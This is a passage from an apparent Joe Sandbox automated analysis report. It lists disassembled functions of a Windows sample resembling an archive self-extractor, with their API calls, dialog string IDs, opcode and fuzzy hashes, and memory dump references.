                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: ASKNEXTVOL
                                                                                                    • API String ID: 445417207-3402441367
                                                                                                    • Opcode ID: 735e2060739cebe2e210278694f1184c64a003e6d1bd721d32d43c0f28b4f040
                                                                                                    • Instruction ID: 2c77489db19723ec128b50c4aa07b5f04a123d3a04e89e87d542e445ad6c63b7
                                                                                                    • Opcode Fuzzy Hash: 735e2060739cebe2e210278694f1184c64a003e6d1bd721d32d43c0f28b4f040
                                                                                                    • Instruction Fuzzy Hash: 20110D32241600BFD3128F69FC05FFB7758EB06749F581064F241F74A0C7A299899722
                                                                                                    Function 00E1DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010420,00E1B270,?,?), ref: 00E1DE18
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DialogParam
                                                                                                    • String ID: GETPASSWORD1$r$xz
                                                                                                    • API String ID: 665744214-1165776382
                                                                                                    • Opcode ID: 2d4259f3776b5c56dfaa3f7bceb3f48de8634e942e7860db23d21f69f1d257cb
                                                                                                    • Instruction ID: 06ba23fa374becc3ed98f00feb7b8ae51c21d01fa1e7a1d4abbedfdf60597aab
                                                                                                    • Opcode Fuzzy Hash: 2d4259f3776b5c56dfaa3f7bceb3f48de8634e942e7860db23d21f69f1d257cb
                                                                                                    • Instruction Fuzzy Hash: C4112B32608244AEDB11DA34BC06BEF3798AB0A355F145465FD49FB1C1C7B4ACC8C760
                                                                                                    Function 00E0D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __fprintf_l.LIBCMT ref: 00E0D954
                                                                                                    • _strncpy.LIBCMT ref: 00E0D99A
                                                                                                      • Part of subcall function 00E11DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00E41030,?,00E0D928,00000000,?,00000050,00E41030), ref: 00E11DC4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                    • String ID: $%s$@%s
                                                                                                    • API String ID: 562999700-834177443
                                                                                                    • Opcode ID: 40732515790a61e01c695a84c705b8748d84cfbb44e2e088163dfdd2d21b321f
                                                                                                    • Instruction ID: 18edf66ab0085b3448607c160a2e64a50f0febc3d85d4a90ea02d09121081094
                                                                                                    • Opcode Fuzzy Hash: 40732515790a61e01c695a84c705b8748d84cfbb44e2e088163dfdd2d21b321f
                                                                                                    • Instruction Fuzzy Hash: F821AF32444348AEDB21EEE8CC05FEE7BE8AF45304F441522F910B61E2E2B2D688CB51
                                                                                                    Function 00E10E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E85
                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E8F
                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00E0AC5A,00000008,?,00000000,?,00E0D22D,?,00000000), ref: 00E10E9F
                                                                                                    Strings
                                                                                                    • Thread pool initialization failed., xrefs: 00E10EB7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                    • Opcode ID: 62c4fee5f6a2f7d9181ce97fec3758e427bffe51045812db4cab2c499277fc1f
                                                                                                    • Instruction ID: 1ad8a32e3cff658d5f3b23c8b8571e3340c9dd6fa49fd85d84329b6003292f44
                                                                                                    • Opcode Fuzzy Hash: 62c4fee5f6a2f7d9181ce97fec3758e427bffe51045812db4cab2c499277fc1f
                                                                                                    • Instruction Fuzzy Hash: B81191B16407089FD7215F779C88AA7FBECEB54744F14582EF1DAD2200D6B159C08B50
                                                                                                    Function 00E0124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Malloc
                                                                                                    • String ID: ($2$A
                                                                                                    • API String ID: 2696272793-112831991
                                                                                                    • Opcode ID: 29681a57fb0935e744a9ad1c5ada26a7c9a8733d874ee5edb8d77c1c4e76c39d
                                                                                                    • Instruction ID: e514d2e0fefb66c1c33729b1e2a86fcd8dab928c43368b7b923574acdd7e5e86
                                                                                                    • Opcode Fuzzy Hash: 29681a57fb0935e744a9ad1c5ada26a7c9a8733d874ee5edb8d77c1c4e76c39d
                                                                                                    • Instruction Fuzzy Hash: 61011771901229AFCF14CFA5E848AEFBBF8AF09354B10416AE906F7250D7749A44DFA4
                                                                                                    Function 00E1DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                    • API String ID: 0-56093855
                                                                                                    • Opcode ID: 9ddfa4d357152d78d93ba3164bf80fe68fbdc289b0ec8a42c9fe7af356bf000a
                                                                                                    • Instruction ID: e64a28c10fd29ced0e21770c629cc0cf1702c3070495502f4457533ec6951b4d
                                                                                                    • Opcode Fuzzy Hash: 9ddfa4d357152d78d93ba3164bf80fe68fbdc289b0ec8a42c9fe7af356bf000a
                                                                                                    • Instruction Fuzzy Hash: E201DE3AA08245AFCB108F66FC049DA7BA8E74A384F001426F911F2230C6308899DBA0
                                                                                                    Function 00E01316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0E2E8: _swprintf.LIBCMT ref: 00E0E30E
                                                                                                      • Part of subcall function 00E0E2E8: _strlen.LIBCMT ref: 00E0E32F
                                                                                                      • Part of subcall function 00E0E2E8: SetDlgItemTextW.USER32(?,00E3E274,?), ref: 00E0E38F
                                                                                                      • Part of subcall function 00E0E2E8: GetWindowRect.USER32(?,?), ref: 00E0E3C9
                                                                                                      • Part of subcall function 00E0E2E8: GetClientRect.USER32(?,?), ref: 00E0E3D5
                                                                                                    • GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
                                                                                                    • SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                    • String ID: $0
                                                                                                    • API String ID: 2622349952-2895914132
                                                                                                    • Opcode ID: 274d4ab2dc4b4bd8a5261af823dd5faea9201ab62726ef83829977dedb69971a
                                                                                                    • Instruction ID: 05df2e21b3ee83ec7c05bc67f8c73dd36f05f0b53d96e5ecb58ff062740d6408
                                                                                                    • Opcode Fuzzy Hash: 274d4ab2dc4b4bd8a5261af823dd5faea9201ab62726ef83829977dedb69971a
                                                                                                    • Instruction Fuzzy Hash: 87F0AF3010438CABDF150F619C0EBEE3B98AF41388F05A694FC44785E2CB78C9D4EA10
                                                                                                    Function 00E29A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1036877536-0
                                                                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction ID: 053e8f8b07af1c99a9088ed61b5c3540c8e9d58c9b66472d45262797e6914f94
                                                                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                    • Instruction Fuzzy Hash: 92A15972A043A69FDB15CF28E8927AEFBE5EF51314F18616DE485BB283C2348941C754
                                                                                                    Function 00E0A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00E07F69,?,?,?), ref: 00E0A3FA
                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00E07F69,?), ref: 00E0A43E
                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00E07F69,?,?,?,?,?,?,?), ref: 00E0A4BF
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00E07F69,?,?,?,?,?,?,?,?,?,?), ref: 00E0A4C6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2287278272-0
                                                                                                    • Opcode ID: cd3b13c5a7789873ffa9ae706864d11acef6ef28bc4d93c04e1a8e9bc5e5c477
                                                                                                    • Instruction ID: 6dd2ec340a5285cffe48ab6d09b153ebef628426ec3cefea8a4bb8ef048129ca
                                                                                                    • Opcode Fuzzy Hash: cd3b13c5a7789873ffa9ae706864d11acef6ef28bc4d93c04e1a8e9bc5e5c477
                                                                                                    • Instruction Fuzzy Hash: D741A2312483899AD731DF24DC45FEEBBE49B85704F08092DB5E1E31D1D6A89A88DB53
                                                                                                    Function 00E2C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00E247C6,00000000,00000000,00E257FB,?,00E257FB,?,00000001,00E247C6,2DE85006,00000001,00E257FB,00E257FB), ref: 00E2C9D5
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E2CA5E
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00E2CA70
                                                                                                    • __freea.LIBCMT ref: 00E2CA79
                                                                                                      • Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E24286,?,0000015D,?,?,?,?,00E25762,000000FF,00000000,?,?), ref: 00E28E38
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: c78efc0fbb19ee67d1166173756285e4777ec45ecaa2066b3c6cf298222e9a10
                                                                                                    • Instruction ID: 5730a709635ba87c6a3c823ced2a9ffc8d3c9b0e0edacd5675ab229738fdd608
                                                                                                    • Opcode Fuzzy Hash: c78efc0fbb19ee67d1166173756285e4777ec45ecaa2066b3c6cf298222e9a10
                                                                                                    • Instruction Fuzzy Hash: CC31BDB2A0022AABDB24CF65EC45DEE7BA5EF01310B144228FC05F6290EB35CD94CB90
                                                                                                    Function 00E1A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 00E1A666
                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E1A675
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E1A683
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00E1A691
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$Release
                                                                                                    • String ID:
                                                                                                    • API String ID: 1035833867-0
                                                                                                    • Opcode ID: b32c456b5ce347d5459141963574d976ed64c07538ce5c038302776d3bc985e9
                                                                                                    • Instruction ID: 02c3fe60077a340795791a40cdb6146af3d87d2c8a033c91eebcecfebe0deb53
                                                                                                    • Opcode Fuzzy Hash: b32c456b5ce347d5459141963574d976ed64c07538ce5c038302776d3bc985e9
                                                                                                    • Instruction Fuzzy Hash: 07E08C35A42721FFC2A01B72BD0DB8B3E14AB16B92F000100FA05B6190DBA48A0C8BA1
                                                                                                    Function 00E1D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
